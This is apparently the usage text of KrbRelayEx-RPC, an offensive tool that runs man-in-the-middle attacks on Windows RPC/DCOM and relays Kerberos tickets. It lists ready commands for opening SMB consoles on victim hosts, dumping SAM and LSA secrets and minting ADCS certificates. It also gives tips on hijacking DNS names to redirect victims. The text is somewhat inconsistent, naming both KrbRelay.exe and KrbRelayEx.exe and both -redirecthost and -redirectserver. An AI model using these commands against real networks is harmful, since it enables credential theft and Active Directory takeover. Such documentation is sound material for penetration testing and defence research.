RPC/DCOM MiTM 服务器的 Kerberos 中继和转发器

Usage:  KrbRelayEx.exe -spn <SPN> [OPTIONS] [ATTACK]Description:  KrbRelayEx-RPC is a tool designed for performing Man-in-the-Middle (MitM) attacks and relaying Kerberos AP-REQ tickets.  It listens for incoming authenticated ISystemActivator requests, extracts dynamic port bindings from EPMAPPER/OXID resolutions,  captures the AP-REQ for accessing SMB shares or HTTP ADCS (Active Directory Certificate Services endpoints), then dynamically  and transparently forwards the victim's requests to the real destination host and port  The tool can span several SMB consoles, and the relaying process is completely transparent to the end user, who will seamlessly access the desired RPC/DCOM appliactionUsage:  KrbRelayEx.exe -spn <SPN> [OPTIONS] [ATTACK]SMB Attacks:  -console                       Start an interactive SMB console  -bgconsole                     Start an interactive SMB console in background via sockets  -list                          List available SMB shares on the target system  -bgconsolestartport            Specify the starting port for background SMB console sockets (default: 10000)  -secrets                       Dump SAM & LSA secrets from the target systemHTTP Attacks:  -endpoint <ENDPOINT>           Specify the HTTP endpoint to target (e.g., 'CertSrv')  -adcs <TEMPLATE>               Generate a certificate using the specified templateOptions:  -redirectserver <IP>           Specify the IP address of the target server for the attack  -ssl                           Use SSL transport for secure communication  -redirectports <PORTS>         Provide a comma-separated list of additional ports to forward to the target (e.g., '3389,445,5985')  -rpcport <PORT>                Specify the RPC port to listen on (default: 135)Examples:  Start an interactive SMB console:    KrbRelay.exe -spn CIFS/target.domain.com -console -redirecthost <ip_target_host>  List SMB shares on a target:    KrbRelay.exe -spn CIFS/target.domain.com -list  Dump SAM & LSA secrets:    KrbRelay.exe -spn CIFS/target.domain.com -secrets -redirecthost <ip_target_host>  Start a background SMB console on port 10000 upon relay:    KrbRelay.exe -spn CIFS/target.domain.com -bgconsole -redirecthost <ip_target_host>  Generate a certificate using ADCS with a specific template:    KrbRelay.exe -spn HTTP/target.domain.com -endpoint CertSrv -adcs UserTemplate-redirecthost <ip_target_host>  Relay attacks with SSL and port forwarding:    KrbRelay.exe -spn HTTP/target.domain.com -ssl -redirectserver <ip_target_host> -redirectports 3389,5985,135,553,80Notes:  - KrbRelayEx intercepts and relays the first authentication attempt,    then switches to forwarder mode for all subsequent incoming requests.    You can press any time 'r' for restarting relay mode  - This tool is particularly effective if you can manipulate DNS names. Examples include:    - Being a member of the DNS Admins group.    - Having zones where unsecured DNS updates are allowed in Active Directory domains.    - Gaining control over HOSTS file entries on client computers.  - Background consoles are ideal for managing multiple SMB consoles** IMPORTANT: Ensure that you configure the entries in your hosts file to point to the actual target IP addresses!